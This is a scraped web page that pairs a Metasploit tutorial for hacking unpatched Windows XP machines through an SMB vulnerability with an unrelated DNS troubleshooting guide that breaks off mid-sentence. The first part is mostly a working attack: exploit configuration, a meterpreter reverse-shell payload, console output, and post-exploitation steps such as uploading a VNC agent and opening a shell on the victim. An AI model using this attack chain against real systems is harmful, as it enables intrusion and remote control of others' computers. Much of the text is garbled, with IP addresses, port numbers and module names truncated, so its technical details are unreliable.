Hack Windows XP with Metasploit.

Hack Windows XP with MS0.

Using Metasploit it is possible to hack Windows XP machines just by using the IP address of the victim machine. It does not involve installing any backdoor or trojan server on the victim machine. Metasploit does this by exploiting a vulnerability in the Windows samba service called ms. This exploit works on Windows XP up to version XP SP.

The vulnerability/exploit module inside Metasploit is:
Name: Microsoft Server Service Relative Path Stack Corruption.
Module: exploitwindowssmbms.

Further details and references to the vulnerability can be found at the following pages: http cvedetails. MS0.

Note: This exploit is old as of now and will work only if the Windows XP on the target machine is unpatched and not running any firewalls. If you were to scan a range of IP addresses to discover online Windows XP machines, then most of them would likely be patched through automatic updates. So if you want to test and practise this exploit, set up a vulnerable unpatched XP system.

Scan for open ports.

Before exploiting the XP machine with Metasploit it is a good idea to scan for open ports using nmap to confirm that ports are accessible and accepting connections.

Here is a quick example:

email protected nmap n s.V 1.
Starting Nmap 6. 2.PDT.
Nmap scan report for 1.
Host is up 0.
Not shown 9.
PORT STATE SERVICE VERSION.
Microsoft Windows RPC.
Microsoft Windows XP microsoft ds.
Microsoft HTTPAPI httpd 1.
SSDPUPn.P.
MAC Address 0.D3 2.C 3.
7 Cadmus Computer Systems.
Service Info OS Windows CPE cpe o microsoft windows.
Service detection performed. Please report any incorrect results at http nmap.
Nmap done 1 IP address 1 host up scanned in 7.

Check the port number 4. It is running the microsoft ds samba service. This service is used to share printers and files across the network. It is this service that is vulnerable to the above-mentioned exploit and would be hacked next using Metasploit.

Exploit using Metasploit.

The exploit is quite easy to launch. Start msfconsole. Select the exploit with the use command. If you want to read information about the exploit then type info and hit enter.

See the options available:

msf exploitms.
Module options exploitwindowssmbms.
Name Current Setting Required Description.
RHOST yes The target address.
RPORT 4.Set the SMB service port.
SMBPIPE BROWSER yes The pipe name to use BROWSER, SRVSVC.
Exploit target.
Automatic Targeting.

The important option to set is the RHOST (Remote Host). This is the IP address of the victim machine that is running the vulnerable Windows XP. In this example the IP address is 1. So set the option:

msf exploitms.RHOST 1.RHOST 1. 92.
Select the payload.

Next comes the payload. The payload is the piece of code that runs along with the exploit and provides the hacker with a reverse shell. We are going to use the Windows meterpreter payload. If you want to see all the available payloads then use the show payloads command.

Why meterpreter? Because meterpreter is a very powerful kind of reverse shell that has lots of functionality already built in. The functionality includes common post-exploitation tasks like scanning the target's network, hardware, accessing devices etc. Meterpreter can also start a VNC session.

Check options once again.

Now that we have selected our payload, it's time to check the options once again.

Module options exploitwindowssmbms.
Name Current Setting Required Description.
RHOST 1.The target address.
RPORT 4.Set the SMB service port.
SMBPIPE BROWSER yes The pipe name to use BROWSER, SRVSVC.
Payload options windowsmeterpreterreversetcp.
Name Current Setting Required Description.
EXITFUNC thread yes Exit technique seh, thread, process, none.
LHOST yes The listen address.
LPORT 4. The listen port.
Exploit target.
Automatic Targeting.

Now the options also include the payload options. The important options to set are LHOST and LPORT. The LHOST is the IP address of the local machine or hacker machine. The LPORT is the port number on which the reverse shell listener will receive the incoming shell. So set up the correct values:

msf exploitms.LHOST 1.LHOST 1. 92.
LPORT 6.LPORT 6.

Launch the exploit.

Now Metasploit is all configured to launch the exploit. Enter exploit and hit enter.

Started reverse handler on 1.
Automatically detecting the target.
Fingerprint Windows XP Service Pack 3 lang English.
Selected Target Windows XP SP3 English Always.On NX.
Attempting to trigger the vulnerability.
Sending stage 7.
Meterpreter session 2 opened 1.

If it runs correctly you finally get the meterpreter shell. Type in help and hit enter to see what commands are available. Let's try running some of the common commands.

Post Exploitation with meterpreter.

Get system information.

The sysinfo command will get the system information of the victim machine.

Computer.
OS Windows XP Build 2.Service Pack 3.
Architecture x.
System Language enUS.
Meterpreter x.

This shows some basic information about the Windows installation.

Get network information.

The ipconfig command will show the network interfaces and their network configuration.

Name MS TCP Loopback interface.
Hardware MAC 0.
MTU 1.
IPv. 4 Address 1.
IPv.Netmask 2.

Name AMD PCNET Family PCI Ethernet Adapter Packet Scheduler Miniport.
Hardware MAC 0.
MTU 1.
IPv. 4 Address 1.
IPv.Netmask 2.

Start VNC server.

If you want a VNC session on the victim machine then run the vnc script.

Creating a VNC reverse tcp stager LHOST1.LPORT4.
Running payload handler.
VNC stager executable 7.
Uploaded the VNC agent to C WINDOWSTEMPr.Rlm.Dx.
exe must be deleted manually.
Executing the VNC agent with endpoint 1.

It takes a few seconds, and then a window will pop up with the remote desktop of the victim machine. Now you can use your mouse to interact with the victim desktop as if it were your own.

Browsing the file system.

For browsing the file system there are lots of Linux-style commands.

Command Description.
Read the contents of a file to the screen.
Change directory.
Download a file or directory.
Edit a file.
Print local working directory.
Print working directory.
Change local working directory.
Print local working directory.
List files.
Make directory.
Print working directory.
Delete the specified file.
Remove directory.
Search for files.
Upload a file or directory.

Get native shell.

If you finally want the command-prompt-style shell on the victim machine, enter shell and hit enter.

Process 1.
Channel 3 created.
Microsoft Windows XP Version 5.
C Copyright 1.Microsoft Corp.
C WINDOWSsystem.

Now it's the Windows command prompt. Play around with it and when done, type exit and press enter. It will come back to the meterpreter session.

Next.

The meterpreter commands shown above were just the basic commands of meterpreter. Meterpreter has lots of inbuilt scripts that can do lots of other things on the victim machine. We shall check them out in some other post. So keep hacking till then.

Last Updated On 8th May 2.

Fix DNS Server Not Responding Error: A Step-by-step guide.

This is a complete guide on fixing the DNS Server isn't Responding error. I was just about to post an article on a different topic, but then I noticed that for some reason, some websites were not opening up. There were no error messages and the web page comes with an option to click on diagnostic tools to find the cause. I confirmed that my internet connection was working fine as I was able to go to Google and look for search results. The next step was to open these websites with browsers such as IE, Firefox and Chrome. The logic is to
check if it is a browser-related problem. All my web browsers had the same issue, which confirmed this is not a browser problem. Then I tried the diagnostic tool link that popped up in the webpage, which showed me the DNS Server Not Responding Error. After performing some troubleshooting, I was able to fix the issue. Thought I would share it in this article.

Reasons for getting DNS Server Not Responding Error.

The server which hosts the website might be temporarily down due to technical reasons.
The DNS service in your computer is corrupted or not working.
The security firewall or security software itself might have accidentally blocked your PC from communicating with a website or certain websites.

How to narrow down the source of DNS Server Not Responding Error.

If you have another computer or mobile device accessing the internet from the same network, then check if they are able to access the internet. The other mobile device can be a smartphone or tablet. If the other devices have an internet connection, then this is an issue with your computer. If the other devices are not able to access the internet, don't waste any time and contact your ISP. Explain the scenario to them and they will help. Some ISP technicians are quick to blame your computer for this issue.

Try to access the internet using safe mode with networking. It is explained below under the section How to fix DNS Server Not Responding Error because of a corrupted security. If your computer is able to access the internet in safe mode with networking, security software or conflicting third-party software might be responsible for the problem.

If you are getting the DNS server error only on a couple of websites, then it might be a temporary issue with the server which is hosting that website. You can check it using websites like http downorisitjustme. Just enter the name of the website that you would like to check. This website will ping your destination website and let you know if it is up or down. In case it shows that the website you want is up and
running properly, but you are not able to see it, then the problem is with your computer. If the website is shown as down or not working, you need to wait until the webmaster of the website gets the issue fixed.

Check if the error is a browser problem by browsing websites using different browsers such as IE, Firefox, Chrome, Safari or Opera. This happens rarely, but it is possible. If the error is happening only on a particular browser, then you need to troubleshoot the browser. Follow the steps mentioned in IE optimization, which fix most issues no matter which browser you use. Here is how to do a complete Internet Explorer optimization.

How to fix a DNS Server Not Responding Error Normally.

If you haven't done any troubleshooting yet, try the steps in this order.

Reset IP and Winsock.

The problem might be a result of corrupted IP and Winsock settings. Follow the commands in order to reset the settings.

Open a command prompt with Admin privilege.
For Win 1. Start button, click Command Prompt Admin.
For Win 7 and Win 8, click Start, type cmd inside the search window, right click on the result which shows command prompt, click Run as administrator.

Use the commands in the following order:

ipconfig /flushdns
ipconfig /registerdns
netsh int ip reset c resetlog.

Restart the computer and check if the problem is fixed.

Note: The flushdns command is used to flush the DNS database cache, while the IP and Winsock commands reset these settings.

Restart the computer and check if the problem is fixed. If not, follow the next step.

Do a Power cycle.

Sometimes the fix might be as simple as shutting down and turning on the modem/router. Small changes in computer settings or a change in configuration with router or modem settings may result in a DNS error. Once the device is restarted most of these changed settings will be cleared. So follow the step.

Shut down your computer and also the modem/router for a minute or two.

Note: It is recommended to turn devices off for a minute or two to allow these devices to drain the electrical charge completely, which results
in a complete reset.

Restart both computer and router to check if the DNS problem is fixed. If not, follow the next step.

Use Global DNS.

Replace the DNS server address from your ISP with a Global DNS. Global DNS is provided by different private and non-profit organizations. Each server address comes with its own special features, which are listed below. Check if the problem is fixed. Changing the Preferred and Alternate DNS addresses usually fixes most of the cases.

Here is a list of DNS addresses which can be used on your computer. You will find the Preferred and Alternate DNS addresses with the provider listed in bold.

Google DNS gives faster performance.
Neustar's DNS is safe and fast.
Comodo's DNS for extra security.
Norton Connect Safe detects pornographic and harmful websites. Ideal for setting on a minor's computer.
Free DNS: access to all domains irrespective of regional and censorship issues.
DNS Watch is ideal for high performance.

Check this article if you notice Windows 1.DNS problems frequently after installing Windows 1.Anniversary Update.

How to fix a DNS Server Not Responding Error because of a corrupted security.

Security software is another major culprit responsible for the DNS Server Not Responding error. Every security software tends to get corrupted over a period of time for reasons ranging from file corruption while updating files, conflicts with other software, or indirect changes to security settings as a result of intentional or unintentional changes made on your PC. This might cause the security software to block the internet connection.

Configure Security Software properly.

It is possible that your security software may have got corrupted or is not working properly for a variety of reasons. Check if your security software is configured properly, especially the Firewall settings. A good method to check this is to disable all security software and firewall. Then check if the problem is fixed. If not fixed, try one more time by resetting all security software and firewall settings to default. Check the
status.

Check the internet status in Safe Mode with Networking.

Safe mode is a troubleshooting mode that allows only the essential operating system files and drivers to load. All third-party software and drivers are prevented from loading. When you select Safe Mode with Networking, apart from the basic OS files and drivers, the network driver is also loaded so that you can go online. Once you reach the desktop, try to go online. If the internet works fine, a third-party program installed on your device is responsible for the problem.

The logic behind using Safe Mode with Networking: If the internet connection works fine in Safe Mode with Networking, then it should be the third-party services or drivers which are responsible for the problem, because these are the services which are blocked in Safe Mode with Networking.

The major culprits to look for in third-party services.

Disable or remove security software.
Uninstall any recently installed device driver.
Uninstall any recently installed software.

DNS server not responding showing only for some websites.

Sometimes the error message happens only on some websites. Of course, you can check if the website in question is working using www. But what if this is happening on authority websites like Google, Microsoft or Yahoo? You cannot expect these websites to be down, and it happens very rarely. The solution mentioned below is simple and it worked very well for me. I apologize for not having any logical explanation as to why this error happens only on some websites. You are always welcome to share your opinion on this.

Open ncpa.